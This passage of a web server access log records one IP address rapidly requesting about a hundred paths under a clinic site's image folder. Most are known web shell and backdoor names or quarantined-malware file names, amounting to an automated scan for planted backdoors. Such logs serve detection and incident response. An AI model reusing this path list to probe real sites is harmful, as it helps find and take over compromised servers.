/our-clinics/img/icons/user.php HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:30 -0400] "GET /our-clinics/img/icons/z.php HTTP/1.1" 301 263 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:30 -0400] "GET /our-clinics/img/icons/wp-settings.php HTTP/1.1" 301 273 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:31 -0400] "GET /our-clinics/img/icons/leaf.php HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:31 -0400] "GET /our-clinics/img/icons/wso1.php HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:32 -0400] "GET /our-clinics/img/icons/class.php HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:32 -0400] "GET /our-clinics/img/icons/ze.php HTTP/1.1" 301 264 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:33 -0400] "GET /our-clinics/img/icons/.htaccess HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:33 -0400] "GET /our-clinics/img/icons/one-lin.jsp HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:33 -0400] "GET /our-clinics/img/icons/jsfshell.xhtml HTTP/1.1" 301 272 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:34 -0400] "GET /our-clinics/img/icons/HitCount.jsp HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:34 -0400] "GET /our-clinics/img/icons/wm_cfshared.jsp HTTP/1.1" 301 273 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:36 -0400] "GET /our-clinics/img/icons/msok.aspx HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:36 -0400] "GET /our-clinics/img/icons/favicon.jsp HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:37 -0400] "GET /our-clinics/img/icons/app.php HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:37 -0400] "GET /our-clinics/img/icons/autoload_classmap.php HTTP/1.1" 301 279 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:41 -0400] "GET /our-clinics/img/icons/field.php HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:41 -0400] "GET /our-clinics/img/icons/library.php HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:44 -0400] "GET /our-clinics/img/icons/module.php HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:48 -0400] "GET /our-clinics/img/icons/lib.php HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:48 -0400] "GET /our-clinics/img/icons/on.php HTTP/1.1" 301 264 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:49 -0400] "GET /our-clinics/img/icons/viewer.php HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:49 -0400] "GET /our-clinics/img/icons/tok.php HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:50 -0400] "GET /our-clinics/img/icons/.tmb HTTP/1.1" 301 262 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:51 -0400] "GET /our-clinics/img/icons/clear.php HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:51 -0400] "GET /our-clinics/img/icons/defense.php HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:52 -0400] "GET /our-clinics/img/icons/framework.php HTTP/1.1" 301 271 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:52 -0400] "GET /our-clinics/img/icons/inc.php HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:55 -0400] "GET /our-clinics/img/icons/view.php HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:55 -0400] "GET /our-clinics/img/icons/Login.php HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:55 -0400] "GET /our-clinics/img/icons/msleaf.php7 HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:56 -0400] "GET /our-clinics/img/icons/test.php7 HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:56 -0400] "GET /our-clinics/img/icons/index.php.malware HTTP/1.1" 301 275 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:57 -0400] "GET /our-clinics/img/icons/media.php HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:57 -0400] "GET /our-clinics/img/icons/x7.php HTTP/1.1" 301 264 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:58 -0400] "GET /our-clinics/img/icons/1sis.php HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:58 -0400] "GET /our-clinics/img/icons/worksec.php HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:58 -0400] "GET /our-clinics/img/icons/9WOLF.php HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:59 -0400] "GET /our-clinics/img/icons/goat11.PhP7 HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:59 -0400] "GET /our-clinics/img/icons/defaults.php.malware HTTP/1.1" 301 278 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:00 -0400] "GET /our-clinics/img/icons/epinyins.php HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:00 -0400] "GET /our-clinics/img/icons/wp-login.php.suspected HTTP/1.1" 301 280 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:00 -0400] "GET /our-clinics/img/icons/rk2.php HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:01 -0400] "GET /our-clinics/img/icons/psm.php HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:02 -0400] "GET /our-clinics/img/icons/fix.php HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:03 -0400] "GET /our-clinics/img/icons/buy.txt HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:03 -0400] "GET /our-clinics/img/icons/wp-themes.php7 HTTP/1.1" 301 272 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:04 -0400] "GET /our-clinics/img/icons/setupp.html HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:07 -0400] "GET /our-clinics/img/icons/php.php7 HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:15 -0400] "GET /our-clinics/img/icons/mailer.phtml HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:15 -0400] "GET /our-clinics/img/icons/mailer.php8 HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:15 -0400] "GET /our-clinics/img/icons/fix.phtml HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:16 -0400] "GET /our-clinics/img/icons/2321782c1cbc3ab1fe299367c81505f8akc.php HTTP/1.1" 301 297 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:16 -0400] "GET /our-clinics/img/icons/wp-commentsrssl.php HTTP/1.1" 301 277 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:17 -0400] "GET /our-clinics/img/icons/readme.html HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:17 -0400] "GET /our-clinics/img/icons/wp-comments-post.php HTTP/1.1" 301 278 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:18 -0400] "GET /our-clinics/img/icons/help.php HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:18 -0400] "GET /our-clinics/img/icons/alfa-rex.php HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:18 -0400] "GET /our-clinics/img/icons/jp.php HTTP/1.1" 301 264 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:19 -0400] "GET /our-clinics/img/icons/wp-p.php7 HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:19 -0400] "GET /our-clinics/img/icons/about.php.malware HTTP/1.1" 301 275 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:20 -0400] "GET /our-clinics/img/icons/index.php.suspected HTTP/1.1" 301 277 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:20 -0400] "GET /our-clinics/img/icons/wp-trackback.php.suspected HTTP/1.1" 301 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:20 -0400] "GET /our-clinics/img/icons/x.php HTTP/1.1" 301 263 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:21 -0400] "GET /our-clinics/img/icons/themes.php HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:24 -0400] "GET /our-clinics/img/icons/users.php HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:28 -0400] "GET /our-clinics/img/icons/proxy-jsp.jsp HTTP/1.1" 301 271 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:29 -0400] "GET /our-clinics/img/icons/content.php HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:30 -0400] "GET /our-clinics/img/icons/index2.php HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:30 -0400] "GET /our-clinics/img/icons/wp-register.php HTTP/1.1" 301 273 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:31 -0400] "GET /our-clinics/img/icons/alfa.php HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:31 -0400] "GET /our-clinics/img/icons/basic.php HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:31 -0400] "GET /our-clinics/img/icons/wp-config.php.malware HTTP/1.1" 301 279 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:32 -0400] "GET /our-clinics/img/icons/wp-config.php.suspected HTTP/1.1" 301 281 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:32 -0400] "GET /our-clinics/img/icons/wpstamina.php HTTP/1.1" 301 271 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:33 -0400] "GET /our-clinics/img/icons/ca.php HTTP/1.1" 301 264 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:33 -0400] "GET /our-clinics/img/icons/wp-admins.php HTTP/1.1" 301 271 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:34 -0400] "GET /our-clinics/img/icons/wpstart.php HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:34 -0400] "GET /our-clinics/img/icons/1911.php HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:34 -0400] "GET /our-clinics/img/icons/.LuFix-983426.php HTTP/1.1" 301 275 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:35 -0400] "GET /our-clinics/img/icons/wp-activites.php HTTP/1.1" 301 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:35 -0400] "GET /our-clinics/img/icons/orven-5645648745.php HTTP/1.1" 301 278 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:36 -0400] "GET /our-clinics/img/icons/OrvceX-87545456892.php HTTP/1.1" 301 280 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:36 -0400] "GET /our-clinics/img/icons/code89765456478.php HTTP/1.1" 301 277 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:37 -0400] "GET /our-clinics/img/icons/stamena-WP.php HTTP/1.1" 301 272 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:37 -0400] "GET /our-clinics/img/icons/b6d7075947e1f31e26a57397478b226eakc.php HTTP/1.1" 301 297 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:37 -0400] "GET /our-clinics/img/icons/js.php HTTP/1.1" 301 264 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:38 -0400] "GET /our-clinics/img/icons/adm.php HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:38 -0400] "GET /our-clinics/img/icons/manager10.jsp HTTP/1.1" 301 271 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:39 -0400] "GET /our-clinics/img/icons/sql.jsp HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:39 -0400] "GET /our-clinics/img/icons/simple.php HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:40 -0400] "GET /our-clinics/img/icons/chosen.php HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:40 -0400] "GET /our-clinics/img/icons/zle.php HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:40 -0400] "GET /our-clinics/img/icons/alfa-rex.php7 HTTP/1.1" 301 271 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:41 -0400] "GET /our-clinics/img/icons/wp-scripts.php HTTP/1.1" 301 272 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:41 -0400] "GET /our-clinics/img/icons/xl2024.php HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:42 -0400] "GET /our-clinics/img/icons/ol.php HTTP/1.1" 301 264 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 